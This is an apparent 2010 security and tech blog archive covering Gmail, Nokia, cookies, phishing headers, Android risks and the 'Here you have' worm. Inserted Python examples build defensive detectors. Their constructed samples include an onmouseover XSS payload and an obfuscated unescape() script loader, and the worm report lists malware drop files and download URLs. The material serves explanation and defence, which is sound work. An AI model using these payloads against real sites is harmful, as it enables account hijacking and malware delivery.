Thursday, September 30, 2010

Google offers to turn off threading in Gmail

Google has finally decided to allow users to turn off the controversial 'conversation view' threading functionality in Gmail.

Conversation view has been a characteristic of Gmail ever since it launched, but Google software engineer Dong Chen admitted in a blog post yesterday that it is the webmail service's "most hotly debated feature".

"Threading enthusiasts say they spend less mental energy drawing connections between related messages, and that their inboxes are much less cluttered," he wrote.

"On the other hand, email traditionalists, like many former Outlook users, think conversation view just complicates something that has worked for years."

Users who prefer traditionally displayed emails will soon be able to toggle off conversation view and see their emails in chronological order, according to Chen.

"We really hoped everyone would learn to love conversation view, but we came to realize that it's just not right for some people," he said.

"Over the next few days, we'll be rolling out conversation view settings to users in organizations with the 'Enable pre-release features' option selected in the Google Apps control panel, and to individuals using Gmail."

Nokia N8 Shipments Begin


Nokia would like the world to know that its upcoming smartphone, the N8, is finished. The first batch of devices has left the factories in Finland and China, and these N8s will soon end up in the hands of customers all over the world.

Many Nokia fans have wondered whether there will be further delays for the N8, and this is probably the best answer to that question. Recently, Nokia informed some of the customers who had pre-ordered the device that they will be receiving it “during October,” as Nokia decided to “hold the shipments for a few weeks to do some final amends.” However, Nokia immediately clarified that the N8 is not being delayed, and now it has proved it with the pictures of N8s leaving the factory.

The high level of transparency from Nokia shows how important the N8 is for the Finnish mobile giant. In a blog post, Nokia explains that while the first users will get the Nokia N8 “before the weekend,” most will be receiving it “over the coming days and weeks.” It’ll be interesting to see if the Nokia N8 can justify the hype when it finally reaches end users.

Xmarks service ends January 2011

Xmarks will be shutting down its free browser synchronization services on January 10, 2011. For details on how to transition to recommended alternatives, consult this page.

For the full story behind the Xmarks shutdown, please read their blog post.

It’s a sad story to me.

Here I found a good article to read: http://www.zdnet.com/blog/networking/no-more-xmarks-no/192

Wednesday, September 29, 2010

Microsoft Kills Live Space blogs

Microsoft announced that it has partnered with WordPress, which from now on will be the default blogging platform for Windows Live users. This means Microsoft is killing its own blogging platform and suggesting that users move to a better platform, WordPress.


At the TechCrunch Disrupt conference, Windows Live Director Dharmesh Mehta announced that all existing Windows Live Spaces users will be migrated over to an account at WordPress.com.

So from now on, users who sign up for a Windows Live account get free Hotmail, the Xbox Live site, a free blog from WordPress.com and other services.

For me this move shows that Microsoft is admitting it cannot compete in the blogosphere, is giving up its own blog network and has started shifting its Live Spaces users over to WordPress.

I think it’s a good decision, because killing an uncompetitive product is better than dragging it along. Just imagine Windows Live Spaces running on Linux-powered WordPress!

Microsoft currently has 30 million people using its Windows Live Spaces blogging platform. Those users can port their blog posts, comments, and photos to WordPress, and redirect their old Spaces URLs to the new blog. Microsoft said Live Spaces users will have 6 months to migrate to WordPress.com.

If you’re not ready to migrate today, you can also choose to download your blog content, migrate later, or delete your Space.

Read more: Windowsteam

Thursday, September 23, 2010

Browser cookies are becoming an issue

The New York Times is reporting a rising number of lawsuits against some major players because of their use of persistent web tracking:

-- Fox Entertainment Group
-- NBC Universal
-- Specific Media
-- Quantcast

The Times said the suits are claiming that the companies used Flash cookies to collect data on browsing activities in spite of the fact that users had privacy settings on to block them.

Those Flash cookies, technically Local Shared Objects (LSOs), are persistent cookies that are stored in several ways and in some cases will restore themselves when deleted. A detailed description of one such mechanism is available here.

There are really mixed reviews on cookies. They range from the paranoid take of the tinfoil hat crowd (“it’s the government! Remember Roswell?”) to the mindset of marketing folks who find targeted advertising a very handy tool. And, hey, advertising does pay the bills.

Everyone agrees that, yes, it is possible for the marketeers to amass a lot of data about individuals by using cookies to monitor browsing activity. The question that probably will be decided in court is: “how much monitoring should be allowed?”

Cookie counter measures
On the New York Times site, someone calling him or herself “Blue Sun” from Stockton, NJ, left a long and detailed comment on the article “Retargeting Ads Follow Surfers to Other Sites” describing an entire set of anti-tracking practices, including the names of several Firefox add-ons.

Blue Sun recommends using Firefox because it has lots of add-ons and lists a number that are useful:

-- Ghostery, blocks invisible trackers such as web 'bugs', pixels and beacons used by behavioral data providers and ad networks.
-- BetterPrivacy, identifies and enables you to delete locally shared objects (described above).
-- Click&Clean
-- Eraser
-- Privacy Plus

Cookie removal
You can remove the advertising cookies (not the LSOs) on your machine whenever you want:

In the Firefox menu: Tools | Privacy | Remove Individual Cookies

It’s impressive just to look in there and see the number of cookies that you’ve accumulated. If you “remove all cookies”, keep in mind that you’re going to be required to enter your log-in name and password again on those pages on which you’ve “saved passwords” in the past.


The Firefox add-on Adblock Plus is another little helper that will simply stop ads from appearing when you visit pages that contain them. (Tools | Add-ons | Get Add-ons).


Those who would like a strong dose of Web security can also disable JavaScripting. Unfortunately that kills a lot of very useful functionality on web pages, including logins and shopping.


Macromedia's help page that describes how to use Flash Player security settings is here.


The Firefox add-on NoScript is also an excellent option for controlling the JavaScript running in your browser. It gives you the choice, per site, of letting scripts run or not. That's a much more graceful way of doing it than simply shutting JavaScript off in the Firefox options.

Twitter XSS vulnerability fixed


Twitterers are still clogging the micro-blogging service with little messages about the cross-site-scripting problem earlier today. Twitter has announced that the problem has been fixed.

A cross-site scripting vulnerability using "onmouseover" was being widely exploited to spread worms and redirect viewers to malicious sites.

Story here from The Register.

More Spam with JavaScript redirectors

We received new spam emails which contain a JavaScript redirector in the form of an HTML attachment. The emails we received have the subject “Consultation Appointment”.

The decrypted JavaScript turns out to be yet another layer of JavaScript code.

This JavaScript redirector loads yet another JavaScript file from the internet. The domain which is hosting the malicious .js is registered to someone from Malaga. Domain tools show that this person has registered about 2,400 other domains.

The downloaded file contains an invisible, hidden iframe which is supposed to download further code from the internet. The target behind that iframe is already offline, luckily.
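As an added example (not the post's own code or sample), the following Python scans an HTML attachment for the traits described in this post: an inline script that relies on decoding functions such as unescape, a zero-size or hidden iframe, and external script sources. It also decodes the unescape("...") layer so the second-stage script source becomes visible, which is what the post's "decrypted JavaScript" step does by hand. The HTML attachment, the example.invalid hostnames and the function names are constructed for this demo; the real sample is not reproduced.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# Constructed attachment modelled on the post's description: an obfuscated
# inline script plus a zero-size iframe. It is NOT the real sample.
SAMPLE_ATTACHMENT = """<html><body>
<script>var s=unescape("%3Cscript%20src%3D%22http%3A//example.invalid/x.js%22%3E%3C/script%3E");document.write(s);</script>
<iframe src="http://example.invalid/load.php" width="0" height="0" style="display:none"></iframe>
<p>Consultation Appointment</p>
</body></html>"""

# Functions that legitimate one-page attachments rarely need but redirectors use to unpack themselves.
SUSPICIOUS_JS = re.compile(r'\b(unescape|eval|fromCharCode|document\.write)\b')


class RedirectorScanner(HTMLParser):
    """Collect (finding_type, detail) tuples while walking the markup."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == 'iframe':
            width, height = a.get('width', ''), a.get('height', '')
            style = (a.get('style') or '').replace(' ', '').lower()
            hidden = (width in ('0', '0px') or height in ('0', '0px')
                      or 'display:none' in style or 'visibility:hidden' in style)
            if hidden:
                self.findings.append(('hidden_iframe', a.get('src', '')))
        elif tag == 'script':
            self._in_script = True
            if a.get('src'):
                self.findings.append(('external_script', a['src']))

    def handle_endtag(self, tag):
        if tag == 'script':
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser hands script bodies to handle_data as raw text.
        if self._in_script:
            hits = sorted(set(SUSPICIOUS_JS.findall(data)))
            if hits:
                self.findings.append(('obfuscated_script', ','.join(hits)))


def scan_attachment(html_text):
    """Return the list of findings for one HTML attachment."""
    scanner = RedirectorScanner()
    scanner.feed(html_text)
    scanner.close()
    return scanner.findings


def decode_unescape_layer(html_text):
    """Return the decoded contents of every unescape("...") call, i.e. the next stage."""
    return [unquote(m) for m in re.findall(r'unescape\("([^"]*)"\)', html_text)]


if __name__ == '__main__':
    print(scan_attachment(SAMPLE_ATTACHMENT))
    for stage in decode_unescape_layer(SAMPLE_ATTACHMENT):
        print('next stage:', stage, '->', scan_attachment(stage))
```

Feeding the decoded stage back into scan_attachment is what reveals the externally hosted .js the post mentions; a real redirector may nest several such layers, so the loop is worth repeating until no unescape() calls remain.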

Tuesday, September 21, 2010

Twitter XSS getting abused

A new security flaw on Twitter is currently being exploited. Hackers found a way to inject malicious JavaScript code into tweets with the onMouseOver event. This can lead to pop-ups appearing, redirecting to websites, re-tweeting spam, or even worse things like cookie stealing (compromising the user accounts). The problem is that Twitter doesn’t properly filter out some tags in tweets.

Users should be very cautious when seeing colored text blocks (background and text colors are the same, called “rainbow tweets”) – these are currently mostly used to exploit the security vulnerability. Hopefully, Twitter closes the security hole soon! Until then, using the NoScript web browser extension or disabling JavaScript on Twitter helps against the attack. Third-party Twitter applications that use the Twitter API are also not affected.
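As an added example (not code from this post, from the post above on the same bug, or from Twitter), the Python below models the bug class both posts describe: a linkifier that drops the matched URL straight into an href attribute lets a double quote in the tweet text close the attribute and start an event-handler attribute, whereas an encoder that HTML-escapes the text and only accepts URL characters does not. The tweet text, the example.com URL and the function names are constructed for the demo.

```python
import html
import re

# Constructed tweet: the "URL" carries a double quote followed by an
# event-handler attribute. alert(1) stands in for whatever a real tweet carried.
TWEET = 'check this http://example.com/@"onmouseover="alert(1)"/ cool'

# Naive URL matcher: anything non-blank after the scheme counts as the URL.
URL_RE = re.compile(r'https?://\S+')

# Stricter matcher: only characters that may legitimately appear in a URL,
# so a quote or angle bracket can never end up inside the attribute value.
SAFE_URL_RE = re.compile(r'https?://[A-Za-z0-9._~:/?#\[\]@!$&\'()*+,;=%-]+')


def linkify_vulnerable(text):
    """Drops the raw match into the markup; the quote ends the href value."""
    return URL_RE.sub(lambda m: f'<a href="{m.group(0)}">{m.group(0)}</a>', text)


def linkify_hardened(text):
    """Escape every piece of text on output; the URL is attribute-escaped too."""
    out, pos = [], 0
    for m in SAFE_URL_RE.finditer(text):
        out.append(html.escape(text[pos:m.start()]))
        url = m.group(0)
        out.append(f'<a href="{html.escape(url, quote=True)}">{html.escape(url)}</a>')
        pos = m.end()
    out.append(html.escape(text[pos:]))
    return ''.join(out)


def has_event_handler(markup):
    """Crude check used here to show the difference: an on* attribute that
    starts right after whitespace, a quote or a slash is a live handler."""
    return re.search(r'(?:^|[\s"\'/])on[a-z]+\s*=', markup, re.I) is not None


if __name__ == '__main__':
    print(linkify_vulnerable(TWEET))
    print(linkify_hardened(TWEET))
```

The lesson is the usual one for XSS: filtering tags in the input is not enough, since the attacker never needed a tag here; escaping at the point where text becomes markup, and validating what goes into attributes, is what closes the hole.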

Flash Player Updates fix 0-day-vulnerability

Adobe has fixed the vulnerability in Flash Player in record time again. Just one week after the 0-day became public and started to get exploited, an update is available to close the security hole. Even though Adobe Reader and Acrobat are affected as well (they are supposed to get an update in 2 weeks), until now we’ve only seen exploits against the Windows Flash Player.

Users and administrators should update their Flash Player as soon as possible! The version 10.1.85.3 fixes the issue for Windows, Unix, Solaris and is available through Adobe’s download center. Android users can get the update to 10.1.95.1 on the Android Market Place.

Monday, September 20, 2010

Scammers set their sights on Resident Evil: Afterlife

Resident Evil. Man, those films are terrible.

Frankly, I’m happy to end the writeup right there, but if I did you’d miss out on all the fun.

Resident Evil Afterlife is now in cinemas (unfortunately) and scammers are all too happy to cash in.

watchresidentevil4(dot)com is our port of call today:


Try to watch the film, and you’re prompted to install ClickPotato (from Pinball Corp).


There are also four other items pre-ticked, which is nice of them.
Installing that lot gives you a prompt to “see premium content”.

You know where this is going, and it isn’t anywhere other than “the bottom of a ditch”.
I got:


Some sort of sign up to view content website!


A copyright infringement warning!


About six thousand adverts for Russian dating / bride-to-be services!

What I absolutely did not get was any form of Resident Evil action. Depending on how you feel about such things, that might not be such a bad outcome. You still have all of that stuff installed on your PC, though…

Security issues on Android

One unique security feature of Android is the permission check when installing third-party apps. The system lists all permissions that an app requires and asks the user to confirm that this is alright. Such permissions are the ability to read your location, send or receive text messages, access the internet, make phone calls and many more. The user can be sure that the app is not doing any of these activities without the appropriate permission. In case the developer forgets to add a particular permission, the operating system will simply block the corresponding function, which leads to a “Force Close”, meaning the app is terminated.

Not too long ago the first Android Trojan got some media attention. The first variant of the malware (detected by Avira as “TR/SMS.AndroidOS.A”) pretended to be a movie player. Instead of playing movies, the malware sent messages to premium numbers in Russia. Suspiciously, it had to ask the user for permission to send SMS. In this case it should be obvious that a movie player should not be able to send text messages. But what if a Trojan hides in a fancy messaging app instead?
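As an added example (not code from the original post or from Avira), the Python below does what the paragraph asks the user to do by eye: it reads the uses-permission entries from an app's AndroidManifest.xml and compares them with the permissions one would expect for the app's stated purpose, flagging those that cost money or expose private data. The manifest, the package name and the expected-permission set are constructed; the android.permission names themselves are real platform permissions.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = 'http://schemas.android.com/apk/res/android'

# Constructed manifest for a "movie player" that also asks to send and receive SMS.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.movieplayer">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.WAKE_LOCK"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <application android:label="Movie Player"/>
</manifest>"""

# What a media player plausibly needs (constructed baseline for the review).
MOVIE_PLAYER_EXPECTED = {'android.permission.INTERNET', 'android.permission.WAKE_LOCK'}

# Permissions that can cost the user money or read private data.
COSTLY = {'android.permission.SEND_SMS', 'android.permission.CALL_PHONE'}
PRIVATE = {'android.permission.RECEIVE_SMS', 'android.permission.READ_SMS',
           'android.permission.READ_CONTACTS', 'android.permission.ACCESS_FINE_LOCATION'}


def declared_permissions(manifest_xml):
    """Return the android:name of every <uses-permission> element, in manifest order."""
    root = ET.fromstring(manifest_xml)
    return [el.get('{%s}name' % ANDROID_NS) for el in root.iter('uses-permission')]


def review_permissions(manifest_xml, expected):
    """Split the permissions the app did not need into costly, private and other."""
    root = ET.fromstring(manifest_xml)
    unexpected = [p for p in declared_permissions(manifest_xml) if p not in expected]
    return {
        'package': root.get('package'),
        'costly': sorted(p for p in unexpected if p in COSTLY),
        'private': sorted(p for p in unexpected if p in PRIVATE),
        'other_unexpected': sorted(p for p in unexpected if p not in COSTLY | PRIVATE),
    }


if __name__ == '__main__':
    print(review_permissions(SAMPLE_MANIFEST, MOVIE_PLAYER_EXPECTED))
```

The baseline is the weak spot, exactly as the paragraph's closing question points out: for a messaging app, SEND_SMS would sit in the expected set and this check would stay silent, so the review has to look at what the app does with the permission, not only whether it holds it.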

One of the biggest security issues, however, are security exploits. One example was the HTC EVO 4G released earlier this year. There were two exploitable binaries (“skyagent” and “hstools”) that allowed access to the root of the file system. Potentially there could be new exploitable binaries in any new phone, not only in the operating system but also in additional components installed by the phone manufacturers and network providers. Some communities also exploit such vulnerabilities to gain root access to their phones in order to install custom ROMs. Recently, so-called 1-click root tools have become very popular. The risk here is that most of the time these security holes are never fixed until the next OS update, and therefore the vulnerabilities are also a worthwhile target for malware writers! With root access a malicious app could easily install itself as a system application or even load into the Linux kernel directly as a loadable kernel module. The user probably wouldn’t even recognize the malware, and even if they do, they will have a hard time getting rid of it. Even after a factory reset the malware is still active, because during the wipe the system partition is not touched at all. Sure, you can flash a new custom ROM to remove the malware, but then you also void the warranty of your phone.

Another recent example of exploits is Adobe Flash Player. Unfortunately, the tradition of zero-day exploits known from Windows might also catch on on more platforms in the future. There’s already a critical vulnerability in Flash for Android 10.1.92.10 which could allow an attacker to take control of the system. Currently Flash only works on Android 2.2, which is not very widespread yet, but by the end of 2012 Adobe expects to have Flash up and running on 250 million smartphones. Besides that, Flash will not only run on Android but is supposed to run on BlackBerry OS, Symbian, webOS and Windows Phone 7 as well.

After all, Android’s popularity is still at an early stage. However, due to the aggressive growth (currently 200,000 new Android devices are activated every day) the platform gains more and more popularity. It does not only compete with the iPhone and Symbian OS; with the introduction of Android tablet PCs, netbooks and Google TV there will also be some competition for desktop PCs. These are clear signs that in the longer run Android will become a potential target for malware attacks.

Currently there is no critically dangerous malware in the field, but it’s still very important that people use their phone just as carefully as they use their desktop PC, because technically an attack is always possible. Think twice about which apps you are installing, avoid visiting dubious websites and don’t open suspicious links you receive through text messages, emails and social media platforms.

Friday, September 17, 2010

Browser Updates, again

Google released version 6.0.472.59 of its Chrome web browser. It fixes 10 security vulnerabilities; 1 affects only Mac OS X and is rated critical, 6 are rated “high” in severity. As usual, the update should get delivered and installed automatically – but it doesn’t hurt to check via the “Info about Chrome” option in the “settings” menu whether the new version is already installed.

The Mozilla developers pulled the update to Firefox 3.6.9 due to stability issues some users experienced. Now Firefox 3.6.10 is available, which fixes the same security vulnerabilities as 3.6.9 and also the instabilities. It is available via “Help” – “Check for Updates” and should be installed ASAP, too.

New phishing-spam waves using Facebook as bait

We have started to see again a large increase in the amount of emails pretending to come from Facebook. There are two types of emails which are being sent in large amounts currently. Both of them use classical types of social engineering techniques.

The first type is using the old trick with “the photos”. The final target is a website where SMSes can be sent for “free” (note the quotes). I would like to emphasize again that there is nothing out there for free. Even if you don’t pay for it, those who offer the service (or whatever is given for “free”) do get something in exchange. It might be your telephone number, your email address or something similar which is worth a lot on the Internet.


The second email wave uses the old trick with “notifications” from Facebook. The target website is a Canadian Pharmacy website in a new design.


By analyzing the headers of the two messages, we find already known techniques, which were used in the previous outbreaks using some known names as bait. The email headers are very well constructed by adding a lot of entries which make the email look as close as possible to the original Facebook mails.

Fake headers
Received: from [10.18.255.135] ([10.18.255.135:59076])
by mta016.snc1.facebook.com (envelope-from <update+dtymgjriqknv@facebookmail.com>)
(ecelerity 2.2.2.45 r(34067)) with ECSTREAM
id DE/6C-10257-74CA947F; Thu, 16 Sep 2010 23:15:00 -0700
X-Facebook: from zuckmail ([MTI3LjAuMC4x])
by www.facebook.com with HTTP (ZuckMail);
Date: Thu, 16 Sep 2010 23:15:00 -0700
To: <XXX>
From: Facebook <update+dtymgjriqknv@facebookmail.com>
Reply-to: Facebook <update+dtymgjriqknv@facebookmail.com>
Subject: [Definitely Spam?] You have notifications pending
Message-ID: <53365abd632d6d52eed06318304b59c1@www.facebook.com>
X-Priority: 3
X-Mailer: ZuckMail [version 1.00]
X-Facebook-Camp: stale_email
X-Facebook-Notify: stale_email; mailid=d2005b860446af88a804a830f15e92
Errors-To: update+dtymgjriqknv@facebookmail.com
X-FACEBOOK-PRIORITY: 1
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="b1_53365abd632d6d52eed06318304b59c1"

Real headers
Received: from [10.18.255.138] ([10.18.255.138:61673])
by mta015.snc1.facebook.com (envelope-from <notification+o9=o_tfc@facebookmail.com>)
(ecelerity 2.2.2.45 r(34067)) with ECSTREAM
id B3/E5-13534-B62629C4; Thu, 16 Sep 2010 11:31:07 -0700
X-Facebook: from zuckmail ([MTI3LjAuMC4x])
by www.facebook.com with HTTP (ZuckMail);
Date: Thu, 16 Sep 2010 11:31:07 -0700
To: Sorin Mustaca <sorin.mustaca@gmail.com>
From: Facebook <notification+o9=o_tfc@facebookmail.com>
Reply-to: noreply <noreply@facebookmail.com>
Subject: ??? wants to be friends on Facebook.
Message-ID: 96b769da5595cef276c6b4ee6b9aed11@www.facebook.com
X-Priority: 3
X-Mailer: ZuckMail [version 1.00]
X-Facebook-Notify: friend; from=1659283218; mailid=2fc5f99G2738aab8Gca41707G2
Errors-To: notification+o9=o_tfc@facebookmail.com
X-FACEBOOK-PRIORITY: 0
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="b1_96b769da5595cef276c6b4ee6b9aed11"

These are the bottom headers. Looking at the top Received headers, it is clear that the messages were sent by botnet drones (infected computers). The mails almost always carry the same bottom headers as shown in the “Fake headers” block above, but the top Received headers name ever-different servers which have nothing to do with Facebook.

This technique shows clearly that the messages are sent using a botnet. We have seen senders from Australia, Turkey and the USA, but there are definitely senders from other countries as well. As usual, the target domains are owned by a Chinese person and the nameservers are all located in Russia.
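As an added example (not code from the original post), the Python below automates the reasoning of the last two paragraphs: the Received headers below the one written by your own mail server are supplied by whoever connected, so the forged "by mta016.snc1.facebook.com" hop proves nothing, while the topmost Received line, written by your MX, records the IP that really delivered the mail. The message reuses the post's "Fake headers" block with a constructed topmost Received line; mx.example.invalid, the documentation-range addresses 198.51.100.23 and 203.0.113.0/24 (standing in for the sender's published mail ranges) and the function names are assumptions for the demo.

```python
import email
import ipaddress
import re

# Constructed message: the post's forged headers, preceded by the Received line
# our own MX (mx.example.invalid) adds. 198.51.100.23 plays the botnet drone.
SAMPLE = (
    "Received: from [198.51.100.23] (helo=mta016.snc1.facebook.com)\n"
    "\tby mx.example.invalid with ESMTP; Thu, 16 Sep 2010 23:16:10 -0700\n"
    "Received: from [10.18.255.135] ([10.18.255.135:59076])\n"
    "\tby mta016.snc1.facebook.com (envelope-from <update+dtymgjriqknv@facebookmail.com>)\n"
    "\t(ecelerity 2.2.2.45 r(34067)) with ECSTREAM\n"
    "\tid DE/6C-10257-74CA947F; Thu, 16 Sep 2010 23:15:00 -0700\n"
    "X-Facebook: from zuckmail ([MTI3LjAuMC4x])\n"
    "\tby www.facebook.com with HTTP (ZuckMail);\n"
    "From: Facebook <update+dtymgjriqknv@facebookmail.com>\n"
    "Reply-to: Facebook <update+dtymgjriqknv@facebookmail.com>\n"
    "Subject: You have notifications pending\n"
    "\n"
    "You have notifications pending.\n"
)

# Constructed stand-in for the ranges the real sender publishes (e.g. via SPF).
SENDER_NETS = [ipaddress.ip_network('203.0.113.0/24')]


def parse_hops(raw):
    """Return one dict per Received header, topmost (newest) first."""
    msg = email.message_from_string(raw)
    hops = []
    for value in msg.get_all('Received', []):
        flat = ' '.join(value.split())          # unfold the header
        ip = re.search(r'\[(\d{1,3}(?:\.\d{1,3}){3})', flat)
        helo = re.search(r'helo=([\w.-]+)', flat)
        by = re.search(r'\bby ([\w.-]+)', flat)
        hops.append({'ip': ip.group(1) if ip else None,
                     'helo': helo.group(1) if helo else None,
                     'by': by.group(1) if by else None})
    return hops


def analyze(raw, our_mx, sender_nets, sender_domain='facebookmail.com'):
    """Trust only the hop our own MX wrote; judge the From claim by that hop's IP."""
    msg = email.message_from_string(raw)
    hops = parse_hops(raw)
    trusted = next((h for h in hops if h['by'] == our_mx), None)
    if trusted is None or trusted['ip'] is None:
        return {'verdict': 'no trusted hop'}
    ip = ipaddress.ip_address(trusted['ip'])
    from_sender_nets = any(ip in net for net in sender_nets)
    claims_sender = sender_domain in (msg.get('From') or '')
    below = hops[hops.index(trusted) + 1:]      # everything the sender could forge
    verdict = 'spoofed' if claims_sender and not from_sender_nets else 'consistent'
    return {'verdict': verdict, 'connecting_ip': str(ip), 'helo': trusted['helo'],
            'untrusted_internal_hops': len(below)}


if __name__ == '__main__':
    print(analyze(SAMPLE, 'mx.example.invalid', SENDER_NETS))
```

In production the sender ranges come from the SPF record of the claimed domain rather than a hard-coded list, and the HELO name the drone presents (here copied from a real Facebook host) should never be used as evidence on its own.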

The Anti-Botnet Initiative

The Anti-Botnet Initiative has now been started. The initiative is a cooperation of eco and the German Federal Office for Information Security (BSI) and has created a telephone hotline for people whose computers may be infected and part of a botnet. In order to be able to detect this, the major ISPs in Germany are also cooperating (1und1, Telekom, Kabel BW, NetCologne, QSC and Versatel). The ISPs monitor suspicious activity on all IP addresses in their pool. Suspicious activity includes, for example, sending huge amounts of data on certain ports like 25 for SMTP (used to send spam emails), incoming HTTP connections (the infected machine acting as an HTTP server) and so on. Once the ISP detects this, the customer gets an email notification with information about the suspicious activity and various other information (like the telephone number of the hotline). The user is also instructed to have a look at the www.botfrei.de website.
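As an added example (not code from the initiative or from the original post), here is one way the port-25 criterion in the paragraph above can be turned into detection logic on flow records: a residential host that talks SMTP to many distinct destinations within a short window looks like a spam drone, while a host that only sends through its provider's relay does not. The flow records, the 192.0.2.0/24 and 198.51.100.0/24 documentation addresses, the window and the threshold are all constructed for the demo.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed flow records: (start time, source IP, destination IP, dest port, bytes),
# roughly what an ISP's flow collector exports. All addresses are documentation ranges.
T0 = datetime(2010, 9, 16, 23, 0, 0)
FLOWS = []
# 192.0.2.10 fans out to 30 different mail servers on port 25 within five minutes.
FLOWS += [(T0 + timedelta(seconds=10 * i), '192.0.2.10', f'198.51.100.{i + 1}', 25, 4200)
          for i in range(30)]
# 192.0.2.11 sends three mails through its provider's relay (one destination).
FLOWS += [(T0 + timedelta(minutes=i), '192.0.2.11', '192.0.2.25', 25, 3100) for i in range(3)]
# 192.0.2.11 also browses a lot over HTTPS; port 443 must not count.
FLOWS += [(T0 + timedelta(seconds=i), '192.0.2.11', '203.0.113.7', 443, 900) for i in range(50)]


def smtp_fanout(flows, window=timedelta(minutes=10), threshold=20):
    """Return {source: peak distinct port-25 destinations in any `window`}
    for every source whose peak reaches `threshold`."""
    by_src = defaultdict(list)
    for ts, src, dst, dport, _ in flows:
        if dport == 25:
            by_src[src].append((ts, dst))
    flagged = {}
    for src, events in by_src.items():
        events.sort()
        peak, start = 0, 0
        for end in range(len(events)):
            # slide the window start forward until it fits `window`
            while events[end][0] - events[start][0] > window:
                start += 1
            peak = max(peak, len({dst for _, dst in events[start:end + 1]}))
        if peak >= threshold:
            flagged[src] = peak
    return flagged


if __name__ == '__main__':
    print(smtp_fanout(FLOWS))
```

Distinct destinations are a better signal than byte volume for spam, since each spam message is small but goes to a different mail exchanger; a host that legitimately runs its own mail server would need to be whitelisted, which is where the notification-and-hotline step of the initiative comes in.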

There are also two antivirus solutions offered for free to clean up the infected computers. There is an online scanner from Symantec, called DE-Cleaner and there is the Computer Bild Magazine’s DE-Cleaner Rescue system using the Avira anti-malware Technology.


The difference between the two solutions is pretty straightforward: the first one is a Windows program which scans the hard drives while Windows is active, while the other one is a bootable Linux CD which allows the user to start a scan and clean all hard disk partitions while Windows is not running. The advantage of the second method is that it offers the possibility to detect, for example, rootkits that might be running within Windows and hide malware inside the operating system. While the Linux rescue system is running, Windows is completely inactive (unlike in Safe Mode), so the rootkits are not active either. This is actually the only reliable possibility to detect rootkits.

The Avira technologies used in this Rescue System comprise the Command Line Scanner ScanCL, which is also available here. Note that this tool works only when a licensed Avira product (Avira AntiVir Personal suffices) is installed on the computer. The other product used is the Avira Command Line Updater which allows the Rescue System to update the detection engine and the signatures.

By providing its command line scanner for free, Avira continues its strategy to provide a basic antivirus protection for free to everyone.

Saturday, September 11, 2010

“Here you have” worm linked to cyber jihadists

A worm collectively dubbed by the security industry as the “Here you have worm” has been making its way onto corporate networks over the past 24 hours. The worm arrives via e-mail using the subject line “Here you have” or “Just For you” along with an executable disguised as a PDF file. It first appeared last month sending spam e-mails from iraq_resistance@yahoo.com.

The worm creates the following files:  (Note: See the full report in our sandbox -> http://x.maldb.com/?p=44309#more-44309)

/WINDOWS/autorun.inf
/WINDOWS/autorun2.inf
/WINDOWS/csrss.exe
/WINDOWS/ff.exe
/WINDOWS/gc.exe
/WINDOWS/hst.iq
/WINDOWS/ie.exe
/WINDOWS/im.exe
/WINDOWS/op.exe
/WINDOWS/pspv.exe
/WINDOWS/rd.exe
/WINDOWS/re.exe
/WINDOWS/re.iq
/WINDOWS/system/Administrator CV 2010.exe
/WINDOWS/system/updates.exe
/WINDOWS/system32/SendEmail.dll
/WINDOWS/system32/wbem/Logs/wbemcore.lo_
/WINDOWS/system32/wbem/Logs/wbemprox.log
/WINDOWS/tryme1.exe
/WINDOWS/vb.vbs
/autorun.inf
/open.exe

Creates several registry keys to block the execution of anti-malware programs.

Connects to:

members.multimania.co.uk/yahoophoto/tryme.iq
members.multimania.co.uk/yahoophoto/ff.iq
members.multimania.co.uk/yahoophoto/gc.iq
members.multimania.co.uk/yahoophoto/ie.iq
members.multimania.co.uk/yahoophoto/im.iq
members.multimania.co.uk/yahoophoto/m.iq
members.multimania.co.uk/yahoophoto/op.iq
members.multimania.co.uk/yahoophoto/pspv.iq
members.multimania.co.uk/yahoophoto/rd.iq
members.multimania.co.uk/yahoophoto/w.iq
members.multimania.co.uk/yahoophoto/SendEmail.iq
members.multimania.co.uk/yahoophoto/hst.iq
members.multimania.co.uk/yahoophoto/re.iq
members.multimania.co.uk/yahoophoto/tryme.iq

In further research, we have found iraq_resistance to be the known handle of a Libyan hacker/terrorist who we believe to be responsible for at least the first version of the worm discovered in mid-August.

Several underground forum communications have linked “iraq_resistance” to the malware creation as well as the terrorist (electronic jihad) organization “Brigades of Tariq ibn Ziyad.”

Here is a copy of an iraq_resistance post, which states the group’s number one priority loud and clear: “ Prompt Required young people to participate in the campaign of the electronic jihad اجهزة امريكية تابعة للجيش الامريكي Group was established as the Brigades of Tariq ibn Ziyad and goal of this group to penetrate U.S. agencies belonging to the U.S. Army ” – Google Translate Link


Besides the terrorist link, several posts have been made in other underground hacking forums, such as xp10.com.


It’s still unclear if this second revision of the worm is linked to “iraq_resistance” or “Brigades of Tariq ibn Ziyad,”  as neither person/group has claimed responsibility, but it’s highly likely due to the nature of the group.

Thursday, September 09, 2010

New 0-day Exploit for Adobe Reader

A malicious PDF file has turned up which exploits a new security vulnerability in Adobe Reader and Acrobat – even in the most current versions 9.3.4 and 8.2.4, on all supported platforms. There is currently no update available from Adobe which fixes the vulnerability. The company is aware of the problem, though.

The weakness is a buffer overflow within the CoolType.dll of the Adobe Reader and Acrobat installation. While parsing a PDF document with specially prepared SING (Smart INdependent Glyphlets) fonts it is possible to abuse the vulnerability to execute malware.

The malicious PDF has so far been used in limited attacks only. It seems to be an early implementation of the exploit, as it crashes the Reader upon opening the file; after that, another PDF file gets opened to somewhat hide that an infection took place.

